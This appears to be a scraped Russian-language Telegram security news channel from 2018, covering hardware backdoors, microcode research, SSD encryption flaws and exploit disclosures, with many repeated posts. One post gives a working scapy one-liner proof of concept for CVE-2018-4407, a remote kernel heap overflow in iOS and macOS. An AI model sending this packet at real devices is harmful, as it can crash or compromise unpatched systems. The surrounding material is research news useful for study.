Готовимся к записи нового эпизода NoiSeBit 0x21 ”Вымысел и реальность: бэкдоры в железе и прошивках” Основная идея этого выпуска разобраться насколько это реальные вектора атак и кому стоит о них беспокоится уже сегодня.
Noise Security Bit pinned «Готовимся к записи нового эпизода NoiSeBit 0x21 ”Вымысел и реальность: бэкдоры в железе и прошивках” Основная идея этого выпуска разобраться насколько это реальные вектора атак и кому стоит о них беспокоится уже сегодня.»
Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex.
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный процесс. Много интересных и важных тем затронуто в этом выпуске. И внимание интрига, теоритически бэкдор в железе может быть гораздо дешевле, чем имплант в прошивке. Слушайте подкаст целиком, если хотите знать больше! https://noisebit.podster.fm/28
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный процесс. Много интересных и важных тем затронуто в этом выпуске. И внимание интрига, теоритически бэкдор в железе может быть гораздо дешевле, чем имплант в прошивке. Слушайте подкаст целиком, если хотите знать больше! https://noisebit.podster.fm/28
podster.fm
Noise Security Bit 0x21 (Вымысел и реальность: бэкдоры в железе и прошивках) | Noise Security Bit слушать онлайн на podster.fm
Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex.
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный…
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный…
Noise Security Bit pinned «Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex. Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный…»
Микрокод (абстрактый слой микроархитектуры) процессоров Intel является одним из самых закрытых компонентов современных микропроцессоров. Немного пролили свет на его внутреннее устройство исследователи из университета Ruhr-Universität Bochum в своем исследовании "An Exploratory Analysis of Microcodeas a Building Block for System Defenses".
https://www.syssec.rub.de/media/emma/veroeffentlichungen/2018/08/20/constructive_ucode-CCS18.pdf
https://github.com/RUB-SysSec/Microcode
https://www.syssec.rub.de/media/emma/veroeffentlichungen/2018/08/20/constructive_ucode-CCS18.pdf
https://github.com/RUB-SysSec/Microcode
GitHub
GitHub - RUB-SysSec/Microcode: Microcode Updates for the USENIX 2017 paper: Reverse Engineering x86 Processor Microcode
Microcode Updates for the USENIX 2017 paper: Reverse Engineering x86 Processor Microcode - RUB-SysSec/Microcode
Выложили в общий доступ видео всех докладов основного трека конферении DEF CON 26 https://www.youtube.com/playlist?list=PL9fPq3eQfaaD0cf5c7wkzMoj2kifzGO4U
YouTube
DEF CON 26
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.
Зарелизили видео докладов с конференции BlueHat, которая прошла в прошлом месяце https://www.youtube.com/playlist?list=PLXkmvDo4MfuugCoJZaNhWZjgEXeXZgaQR
Apple выложила небольшую статью с подробностями о чипе T2, который сейчас является основных корнем доверия в системе. T2 сильно усложняет атаки на Secure Boot, шифрование FileVault и Secure Enclave (SEP) сопроцессор. Я бы сказал, что на данный момент с точки зрения безопасности прошивки на новых платформах, Apple сильно впереди других вендоров железа https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf
Phrack один из старейших ezine изданий, который зарелизил первый выпуск аж в 1985 году. Здорово, что до сих пор авторитет и качество публикаций этого электронного издания на высоте. Вот и сегодня на сайте phrack опубликована новая статья ”Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability” на которую стоит обратить внимание http://www.phrack.org/papers/viewer_discretion_advised.html
Хорошая книга "Mathematics of Public Key Cryptography" по основам крипторафии с открытым ключем доступна в общем доступе по желанию автора https://www.math.auckland.ac.nz/~sgal018/crypto-book/crypto-book.html
Интересное видео доклада «Effective Memory Safety Mitigations» от Криса Рольфа https://www.youtube.com/watch?v=Q379iWqmodM
YouTube
Qualcomm 2018 Security Summit
Effective memory safety mitigations - Chris Rohlf, Square. Memory Safety mitigations are an important tool for reducing attack reliability and raising exploit development costs. We have all invested a great deal of time and effort into tools, libraries, sandboxes…
iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC в несколько строк:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Любопытный доклад "Smartphone Privacy: How Your Smartphone Tracks Your Entire Life" на тему смартфонов и прайваси. В современном мире пользователь все чаще сам становится продуктом для корпораций, а точнее источником данных. Прежде чем подключаться к очередному бесплатному сервису задумайтесь, что движет компанией, которая его производит? Бесплатного ничего в этом мире нет и компаний альтруистов не существует даже в благотворительности! https://conference.hitb.org/hitbsecconf2018pek/materials/D2T2%20-%20How%20Your%20Smartphone%20Tracks%20Your%20Entire%20Life%20-%20Vladimir%20Katalov.pdf
Интересные новости сегодня вокруг безопасности жестких дисков и технологий полно дискового шифрования. В исследовании "Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs)" обсуждается технология TCG Opal, которую по большей части разработал Intel и внедрил в качестве "безопасного" прокси-интерфейса во всех современных прошивках BIOS. Так вот, к примеру MS Win10 и технология Bitlocker не использует дополнительного шифрования на современных SSD, а только интегрируется со встроенной TCG Opal, что при указанных в исследовании уязвимостях создает возможность для атаки на пароль доступа к жесткому диску. Так же в исследовании говорится о уязвимостях непосредственно в прошивках SSD дисков от Crucial и Samsung, которые при наличие физического доступа позволяют при помощи отладочных интерфейсов успешно обойти часть проверок безопасности. Эти новости все больше наводят на мысли о том, что разработчик ОС должен контролировать полностью и железо, так как без этого всегда найдется уязвимое звено именно там.
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://link.medium.com/ELPjoikaCR
https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://link.medium.com/ELPjoikaCR
https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/
Forwarded from Хакер — Xakep.RU
Пятнадцатая встреча DEFCON Moscow состоится 10 и 11 ноября. Приходи!
15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!
https://xakep.ru/2018/11/07/dc7499/
15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!
https://xakep.ru/2018/11/07/dc7499/
Forwarded from ZeroNights
🔥НОВОСТЬ-ОГОНЬ🔥Финальная программа ZeroNights 2018 — для вас!
Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.
До встречи: https://2018.zeronights.ru/program/.
Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.
До встречи: https://2018.zeronights.ru/program/.
Сегодня Samuel Groß зарелизил свою зксплойт связку (Safari + macOS), которую он использовал для победы в конкурсе Pwn2Own 2018 в начале этого года. Отличное пошаговое описание и код для всей цепочки эксплойтов.
stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018
stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018
GitHub
GitHub - saelo/pwn2own2018: A Pwn2Own exploit chain
A Pwn2Own exploit chain. Contribute to saelo/pwn2own2018 development by creating an account on GitHub.
Что мотивирует исследователей разглашать уязвимости без патчей в Full Disclosure? Причин может быть масса, это и нерасторопность вендоров в выпуске патчей, и отсутствие bug bounty или же просто стремление сделать мир лучше без ожидания возможности опубликовать свой ресеч после патча.
На днях исследователь @MorteNoir опубликовал отличный детальный блог "Full disclosure: 0day-уязвимость побега из VirtualBox", где рассказал о интересном векторе эксплуатации виртуального устройства сетевой карты, который приводит к побегу из guest виртуальной машины в host ОС.
https://habr.com/post/429004/
На днях исследователь @MorteNoir опубликовал отличный детальный блог "Full disclosure: 0day-уязвимость побега из VirtualBox", где рассказал о интересном векторе эксплуатации виртуального устройства сетевой карты, который приводит к побегу из guest виртуальной машины в host ОС.
https://habr.com/post/429004/
Богата эта неделя на отличные описания уязвимостей вот вам еще один (CVE-2018-4331) на который стоит обратить внимание "An introduction to exploiting userspace race conditions on iOS" https://bazad.github.io/2018/11/introduction-userspace-race-conditions-ios/
bazad.github.io
An introduction to exploiting userspace race conditions on iOS | bazad.github.io
XPC service vulnerabilities are a convenient way to elevate privileges and/or evade the sandbox. This post will look at a race condition in GSSCred on macOS ...